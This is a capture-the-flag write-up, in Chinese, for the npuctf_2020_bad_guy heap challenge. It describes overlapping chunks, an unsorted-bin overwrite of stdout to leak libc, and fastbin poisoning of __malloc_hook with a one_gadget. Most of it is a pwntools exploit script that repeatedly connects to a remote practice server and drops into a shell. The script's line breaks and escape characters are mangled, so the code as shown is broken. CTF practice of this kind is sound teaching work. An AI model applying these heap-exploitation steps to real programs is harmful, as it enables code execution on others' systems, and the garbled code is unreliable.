npuctf

npuctf

npuctf_2020_bad_guy

查看保护


edit可以改size。
攻击思路：没有show函数，利用unstortedbin打stdout泄露出libc。接着打fd为malloc_hook - 0x23，改malloc_hook为one_gadget即可。
1.肯定是需要unstortedbin的，所以我们可以这样构造，0x10 0x10 0x60，利用chunk0改chunk1size为0x91，这样的话chunk1和chunk2就被包住 了，在改chunk1 size的时候记得先释放一下chunk3
2.释放chunk3的原因是因为分割unstortedbin的时候让unstortedbin的fd和bk刚好落在chunk3的fastbin的fd和bk上
3.利用chunk3将堆块申请到stdout这里， 改write_base和flags输出libc。
4.再利用上面很相似的手法将堆块申请到malloc_hook - 0x23这里，改成one_gadget就可以了

from pwn import *context(arch='amd64', os='linux')#log_level='debug')file_name = './z1r0'elf = ELF(file_name)def dbg():gdb.attach(r)menu = '>> 'def add(index, size, content):r.sendlineafter(menu, '1')r.sendlineafter('Index :', str(index))r.sendlineafter('size: ', str(size))r.sendafter('Content:', content)def edit(index, size, content):r.sendlineafter(menu, '2')r.sendlineafter('Index :', str(index))r.sendlineafter('size: ', str(size))r.sendafter('content: ', content)def delete(index):r.sendlineafter(menu, '3')r.sendlineafter('Index :', str(index))def attack():add(0, 0x10, 'aaaa')add(1, 0x10, 'aaaa')add(2, 0x60, 'bbbb')add(3, 0x10, 'ccc')delete(2)p1 = p64(0) * 3 + p64(0x91)edit(0, len(p1), p1)delete(1)add(4, 0x10, 'aaa')p2 = p64(0) * 3 + p64(0x71) + b'xddx25'edit(4, len(p2), p2)add(5, 0x60, 'aaaa')p3 = b'a' * 3 + p64(0) * 6 + p64(0xfbad1880) + p64(0) * 3 + b'x00'add(6, 0x60, p3)libc = ELF('./libc-2.23.so')libc_base = vuntil('x7f')[-6:].ljust(8, b'x00')) - 192 - libc.sym['_IO_2_1_stderr_']success('libc_base = ' + hex(libc_base))malloc_hook = libc_base + libc.sym['__malloc_hook']success('malloc_hook = ' + hex(malloc_hook))one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]one_gadget = one[3] + libc_baseadd(7, 0x60, 'aaa')delete(7)p4 = p64(0) * 3 + p64(0x71) + p64(malloc_hook - 0x23)edit(4, len(p4), p4)add(8, 0x60, 'aaa')p5 = b'a' * 0x13 + p64(one_gadget)add(9, 0x60, p5)r.sendlineafter(">> ", "1")r.sendlineafter("Index :", str(10))r.sendlineafter("size: ", str(0x10))r.interactive()while True:try:r = remote('node4.buuoj', 27229)attack()breakexcept:r.close()continue